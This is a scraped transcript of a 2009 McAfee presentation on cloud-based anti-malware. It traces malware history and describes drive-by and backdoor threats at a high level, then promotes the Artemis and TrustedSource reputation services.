in the cloud security - first · in the cloud security - identifying what we don’t know! software...
TRANSCRIPT
![Page 1: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/1.jpg)
July 28, 2009
In the Cloud Security
Greg DayPrincipal Security Analyst EMEAAVERT member
![Page 2: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/2.jpg)
July 28, 20092 Confidential McAfee Internal Use Only
The Tsunami
• Decades of threats, surely we have a handle on this?
• Estimated in excess $1trillion loss through Cybercrime and data loss in 2008McAfee Unsecured Economies Report 2009
• Q1 2009 - 12 million new IP’s zombied since January!50 percent increase since 2008 McAfee Quarterly threat Report Q1 2009
• Koobface - more than 800 new variants in March 09!McAfee Quarterly threat Report Q1 2009
![Page 3: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/3.jpg)
July 28, 20093 Confidential McAfee Internal Use Only
Understand the motivation, to understand the methodology
Source: Chat Interview with the Dream Coders Team, the developers of MPackhttp://www.robertlemos.com/2007/07/23/mpack-interview-chat-sessions-posted/
![Page 4: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/4.jpg)
July 28, 20094 Confidential McAfee Internal Use Only
Today anyone can be a cyber criminal!
![Page 5: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/5.jpg)
July 28, 20095 Confidential McAfee Internal Use Only
Over 20 years of Anti-Virus
• Dr Solomon’s Anti-virus from 1990
• Looking for string match against known malware
![Page 6: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/6.jpg)
July 28, 20096 Confidential McAfee Internal Use Only
The age old question - Is anti-virus dying?
1991 : Michelangelo : 6 months ?1997 : WM/Cap : 2 months ?1999 : WM/Melissa : 1 Day ?2000 : VBS/Loveletter : 4 hours ?2001 : CodeRed/Nimda : 1 hour ?2003 : Slammer : 3 mins ?2008 : Mass Web compromises : secs ?
Anti-Virus protection (%) of 2003 Medium+ threats
0
20
40
60
80
100
AV
AV software% Proactive protection % Reactive Protection
Anti-Virus protection (%) of 2004 Medium+ threats
0
20
40
60
80
100
AV software
%
% Proactive protection % Reactive Protection
![Page 7: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/7.jpg)
July 28, 20097 Confidential McAfee Internal Use Only
From Elephant to Chameleon How threats have changed
![Page 8: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/8.jpg)
July 28, 20098 Confidential McAfee Internal Use Only
Evolution of threats
1987 – Brain & Stoned (Early BSV)1990 – Vienna modified to be polymorphic1991 – Polymorphism hits the wild (Tequila)1995 – WM/Concept (first Macro Virus)1999 – Melissa Mass Mailer & ExploreZip reply mailer2000 – Phage (Virus for Palm Pilot)2001 – CodeRed & Nimda (utilise security vulnerabilities)2002 – Klez & Elkern, Bugbear (Droppers)2003 – Slammer (Speed), Slapper (Unix, directed attack)2004 – Turf wars (Bagle Netsky, Sober, BOTs)2005 – System & data theft (Trojan’s & Rootkit)2007 – Rootkits, Packers, Recycling (Threat Longevity)2008 – Drive-by infections,
![Page 9: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/9.jpg)
July 28, 20099 Confidential McAfee Internal Use Only
Early proactive techniques
![Page 10: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/10.jpg)
July 28, 200910 Confidential McAfee Internal Use Only
Heuristics (behavioural analysis)
•Positive & Negative analysis•Protection against new file and/or macro viruses•Checks for virus like characteristics•Block execution of possible virus code (OAS)•No cleaning as no exact match•Tangible sample to send to virus lab
![Page 11: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/11.jpg)
July 28, 200911 Confidential McAfee Internal Use Only
Speed…
The blended/zero day attack, bought the new solutions
![Page 12: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/12.jpg)
July 28, 200912 Confidential McAfee Internal Use Only
![Page 13: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/13.jpg)
July 28, 200913 Confidential McAfee Internal Use Only
![Page 14: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/14.jpg)
July 28, 200914 Confidential McAfee Internal Use Only
Proactive behavioural protection(HIPS, NIPS, FW, Whitelisting etc…)
• Known Vulnerably detection• Behavioural controls
– RFC non-compliance– Anomaly detections– Policy controls
• Define web/email usage• Lockdown Windows & Windows system folder• Registry Modification• Block un-used ports
– Proactive or Reactive?• Blacklist non-corperate high risk appsConficker – AutoRun.inf
![Page 15: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/15.jpg)
July 28, 200915 Confidential McAfee Internal Use Only
Proactive Behavioural Controls - limitations
• What did I really stop?• Did it stop all of the attack?• What else could it have done?
• We still want to identify the threat• We sometimes need to clean up
• Assumes clean at point of install
![Page 16: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/16.jpg)
July 28, 200916 Confidential McAfee Internal Use Only
• 246% growth from 2006 to 2007
• 400%+ growth projected for 2008
• 2008 exceed projections
2006
900,000 -
800,000 -
700,000 -
600,000 -
500,000 -
400,000 -
300,000 -
200,000 -
100,000 -
0 -
271,197
78,381
2007 2008
1,500,000+
~350,000 projected for ‘08
# of
thre
ats
Source: McAfee Avert Labs
Volume…
![Page 17: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/17.jpg)
July 28, 200917 Confidential McAfee Internal Use Only
The Great Zoo: McAfee Known Malware Samples
17
Count of dirty samples/hashes in the McAfee zoo
![Page 18: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/18.jpg)
July 28, 200918 Confidential McAfee Internal Use Only
Shark – Compliable multi system back door TrojanNow anyone can be a cyber criminal!
1. Setup server
2. Compile threat
3. Infected systemstalk home!
4. See what you have!
5. Full control!
6. Enable keylogger
7. Control processes
![Page 19: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/19.jpg)
July 28, 200919 Confidential McAfee Internal Use Only
Buy the deployment tools
![Page 20: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/20.jpg)
July 28, 200920 Confidential McAfee Internal Use Only
Mass infection of public web pages globally (13 March 08 )
• 200,000 web pages compromised– SQL injection– Vuls in .ASP pages running phpBB
• Inserted JS to write IFRAME in header or body– MS06-014– RealPlayer (ActiveX Control)– Baofeng Storm (ActiveX control)– Ourgame GL World GlobalLink Chat (ActiveX Control)
• Daisy chains to China server– Drops down loaders– Steals gaming credentials
![Page 21: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/21.jpg)
July 28, 200921 Confidential McAfee Internal Use Only
Booby-trapped legitimate sitesBooby-trapped legitimate sites
MPack C&C centerMPack C&C center
(1): connection to a legitimate site
(1): connection to a legitimate site
(2): silent redirect
(2): silent redirect
(3): exploitation(3): exploitation
(4): HTML infection(4): HTML infection
Botnet,RockPhish,Fast-Flux,DDoS,Identity theft,…
(4): machine under control(4): machine under control
1. The victim visits a legitimate site that has been booby-trapped with hidden redirect code (hidden iFrame).
2. They are silently redirected to the server hosting the attack tool.
3. Depending on the browser, various vulnerabilities may be tested. Various malware are downloaded and executed.
4. The web pages accessible from the victim's workstation are in turn booby-trapped.
Example: IFrame & MPack
![Page 22: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/22.jpg)
July 28, 200922 Confidential McAfee Internal Use Only
Regular “Protection Gap”
Protection gap of 24-72 hours with current solutions
Malware in the wild
Malware discovered
Protection is available
Protection is downloaded
Protection is deployed
t1 t2 t3t0 t4
![Page 23: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/23.jpg)
July 28, 200923 Confidential McAfee Internal Use Only
Security in the Cloud
![Page 24: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/24.jpg)
July 28, 200924 Confidential McAfee Internal Use Only
Next Gen “In the cloud” detection
Internet
FingerprintDatabase
![Page 25: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/25.jpg)
July 28, 200925 Confidential McAfee Internal Use Only
End-node reporting
Very little system overhead
Meta-data
What is “in the Cloud scanning”?
![Page 26: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/26.jpg)
July 28, 200926 Confidential McAfee Internal Use Only
In the cloud security -Blocking what we already know!
Non-replicating malware is static
And some replicating is static too (e.g. worms)
Can be detected with a fingerprint (MD5,SHA-1,SHA-2, etc.)
Black List of fingerprints
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
Replicating vs Non-Replicating Malware
![Page 27: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/27.jpg)
July 28, 200927 Confidential McAfee Internal Use Only
How does in the Cloud anti-virus work?
Internet
No detection with existing DATs, but the file is “suspicious”
2
3 Fingerprint of file is created and sent using Artemis
4 Artemis reviews this fingerprint and other inputs statistically across threat landscape
5 Artemisidentifies threat and notifies client
User receives new file via email or web1
6 VirusScan processes information and removes threat
Artemis
Collective Threat Intelligence
![Page 28: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/28.jpg)
July 28, 200928 Confidential McAfee Internal Use Only
In the Cloud in action
![Page 29: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/29.jpg)
July 28, 200929 Confidential McAfee Internal Use Only
In the cloud security -Identifying what we don’t know!
Software may be deemed “suspicious” based onObserved behaviours
SourceDetections by other products
Behaviours, sources, detections can be assigned a weight
Based on the resulting weight, software may be classified as “suspicious” with different degrees of certainty
![Page 30: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/30.jpg)
July 28, 200930 Confidential McAfee Internal Use Only
Closing the loop
![Page 31: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/31.jpg)
July 28, 200931 Confidential McAfee Internal Use Only
Malware case study – Spy-Agent.bw
First seen – 15th October 2008, 22:24:28
Auto-blacklisted – 15th October 2008, 22:57:01
Artemis clients sent fingerprints ~2 hours before regular submission saw the file
![Page 32: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/32.jpg)
July 28, 200932 Confidential McAfee Internal Use Only
Security & privacy
U0B6gKhbtiZCoxyh0IneADS/RShS8iRCBSEvwfjekG/q4yDRgqEUXjHWKvnrySGa6QMdftrlpl5pAdJvOUAcNcvCjKvpIfsxv8qBk4uRQQ60r5StRCXOpiA0Qy3fKmLRUZyNq1EyjLLPKgJDZI
0nqHhRWX+TDgPgXRfW9wD06qE
Cryptographically strong actionable responses
Query specific Immune to replay attacks
Example:
![Page 33: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/33.jpg)
July 28, 200933 Confidential McAfee Internal Use Only
Cloud security compressed “Protection Gap”
Malware in the wild
Malware discovered
Protection is available
Protection is downloadedProtection is
deployed
t1 t2 t3t0 t4
Protection delivered in real-time
t1
Case study – Spy-Agent.bw
• Artemis protection – ~32 minutes• Regular protection – ~8.5 hours
– Not including deployment time
![Page 34: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/34.jpg)
July 28, 200934 Confidential McAfee Internal Use Only
I was blind, but now I see
VulnerabilityResearch
Risk andCompliance
HIPs
Malware Research
SPAMResearch
Collective Threat
Intelligence
SiteAdvisor
Internet
CustomerArtemis customers
![Page 35: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/35.jpg)
July 28, 200935 Confidential McAfee Internal Use Only
Taking it to the next level
![Page 36: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/36.jpg)
July 28, 200936 Confidential McAfee Internal Use OnlyJuly 28, 2009McAfee Global Threat Intelligence36
Atlanta
London
Hong KongSan Jose
IntelliCenterCyberWorld
IntelligenceProbes
Deploy security probes: Around the globe (firewall, email gateways, web gateways)Global intelligence system: Share cyber communication info. (e.g.: hackers, spammers, phishers)
ResultsEffective - Accurate detection of bad IPs, domainsPro-active - Deny connection to intruders to your enterprise
Collaborative Global Intelligence
PhysicalWorld
CIAFBI
Interpol
PoliceStations
PoliceStations
PoliceStationsIntelligence
Agents
ResultsEffective - Accurate detection of offendersPro-active - Stop them from coming in the country
Deploy agents: Officers around the globe (MI5, MI6, FBI, CIA, Interpol.)Global intelligence system: Share intelligence information. (e.g. criminal history, global finger printing system)
ChicagoFrankfurt
![Page 37: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/37.jpg)
July 28, 200937 Confidential McAfee Internal Use Only
Global Intelligence, Local Protection
REAL-TIME PROTECTION PLATFORMS
REAL-TIME PROTECTION PLATFORMS AUTOMATED ANALYSISAUTOMATED ANALYSIS
Dynamic ComputationOf Reputation Score
10 Billion Enterprise Messages
Analyzed per Month
Bad Good
IP Domain URL Image Message
GLOBAL DATA MONITORINGGLOBAL DATA MONITORING
IntelliCenter
Chicago
London
Portland Atlanta
Hong Kong
Global Data Monitoring is Fueled by the Network Effect of Real-Time Information Sharing from Thousands of Gateway Security Devices around the World
Ownership• Whois• Zone files• Trademark
Content• Images• Text• Links
Behavior• Social networks• Persistence• Longevity
Edge / Firewall• Traffic Shaping• Attack Blocking
Web Gateways• Anti-Malware• Anti-Spoofing
Messaging Gateways• Outbreak
Detection• Anti-Spam
Identity FraudApplications
• Anti-Phishing• Zombie Alerts
![Page 38: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/38.jpg)
July 28, 200938 Confidential McAfee Internal Use OnlyJuly 28, 2009McAfee Global Threat Intelligence38
Intelligence: How It All Works….
Internet
Incoming traffic
1
Appliance queries
McAfee Threat Intelligence
2McAfee Threat Intelligence returns reputation info
3
McAfee Threat Intelligence updates records with new reputation info
3
This entire process happens constantly, every second, 7x24x365
TS-enabled appliance
![Page 39: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/39.jpg)
July 28, 200939 Confidential McAfee Internal Use OnlyJuly 28, 2009TrustedSource Data Mining Technologies39
Responder Architecture
• Legacy protocol based on customized DNS servers
• Enhanced proprietary protocol (UDP over SSL)
Query Data
Reputation
Data
Analysis Systems
Inst
an
t A
naly
sis
Internal & External
Data Sources• Historical data
• Message data/metadata
• Neighborhood data
• Ownership data
• Spamtraps and honeypots
• Blacklists
![Page 40: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/40.jpg)
July 28, 200940 Confidential McAfee Internal Use Only
What does it monitor?
• Email– IP Reputation– Message Reputation
• Web – URL Categories– Web Reputation
• Intrusion/FW – IP/Protocol
Reputation – Geo-Location – IPS Attack Vector
Correlation
July 28, 2009TrustedSource Data Mining Technologies40
Dim
en
sio
ns
Virus
Phishing
Spam
ActiveContent
Malware
HackAttack
IPDomain
URL
AttachmentImage
Message
Connection Reputation Content Reputation
Oth
er
Web
Em
ail Zombies, Botnets,
other sources
Compromised or malicious web sites
or URLs
Hacker sites
Image spam, Virus, worms,
Trojans
ActiveX, Java, VB code from infected
web sites
DoS, DDoS, miscother attacks
![Page 41: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/41.jpg)
July 28, 200941 Confidential McAfee Internal Use OnlyJuly 28, 2009TrustedSource Data Mining Technologies41
Message Reputation
Mail Gateway
Mail Gateway
New/ Unknown spammer
New/ Unknown spammer
Known spammerKnown
spammer
1. Known spammer sends
message
2. Message is blocked
3. Unknown sender sends similar
message
4. Message is recognized and
blocked
5. Unknown sender sends
different message
6. Message is associated with new machine in
a botnet and blocked
Allows Reputations to Move Across Identities and Protocols
![Page 42: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/42.jpg)
July 28, 200942 Confidential McAfee Internal Use Only
TS Web Reputation Breakout
July 28, 2009TrustedSource Data Mining Technologies42
![Page 43: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/43.jpg)
July 28, 200943 Confidential McAfee Internal Use Only
Size
Precision
•TrustedSource for Email
•Domain Registrations•WHOIS data•WebWasher classifiers•SmartFilter categories•Web access logs•Malware URLs•Phishing URLs•Spam URLs•Fortune 1000 websites
•Blacklists•Whitelists
•Correlation Mapping (Joint Conditional Mapping)
•Support Vector Machine classification of all parameters
•Parked Domain Identifier•Neighborhood Classification
•Real-Time Classifier•GEO Location•Host information:
•DNS•WHOIS•OS•Webserver•Certificate information
•75 Million Hosts
•More Precise(-180 - +180)
•Identified zombies, malware, suspicious
AnalysisRaw DataReputation
Service
Tru
sted
So
urc
e f
or
Web
Building Web Reputation
-180
Bad
+180
GoodSuspicious
Reputation Range
![Page 44: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/44.jpg)
July 28, 200944 Confidential McAfee Internal Use Only44
TrustedSource Web Database
• Category-based filtering + reputation based filtering = best protection available
• 96 URL categories
• TrustedSource global intelligence augments numerous categories such as Spam, Malicious Sites, Phishing, Hacking/Computer Crime
• Reputation-based filtering for today’s Web 2.0 threats– Provides an additional layer of security– Malicious sites, Spyware, Hacking, P2P, IM and more
• 31+ Million URLs (contains IPs, HTTP and HTTPS URLs)
• Automated proactive and reactive URL gathering systems
• Human review of URLs by multi-lingual/cultural Web Analysts
– Global coverage (language and regions)
• Real-time updates
44
![Page 45: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/45.jpg)
July 28, 200945 Confidential McAfee Internal Use OnlyJuly 28, 2009Artemis Q2 2009 QBR45
TS Web Language breakout
![Page 46: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/46.jpg)
July 28, 200946 Confidential McAfee Internal Use Only46
www.TrustedSource.Org• Public Portal• View reputations for domains, IP
addresses or URLs• Sending patterns of the senders• Analytical information:
– country of origin– network ownership– hosts for known senders within each
domain
• Snapshot of global email trends, including a map illustrating country of origin for email attacks
• Graphs displaying overall email and spam volume trends
• ROI Calculator• ZombieMeter• Domain Health Check• Latest malware threats • Blogs from experts• Top spam senders
46
![Page 47: In the Cloud Security - FIRST · In the cloud security - Identifying what we don’t know! Software may be deemed “suspicious” based on Observed behaviours Source Detections by](https://reader034.vdocuments.site/reader034/viewer/2022042200/5ea0128c4a2cb8055a16198a/html5/thumbnails/47.jpg)
Greg_Day@McAfee.com01000111011100100110010101100111010111110100010001100001011110010100000001001101011000110100000101100110011001010110010100101110011000110110111101101101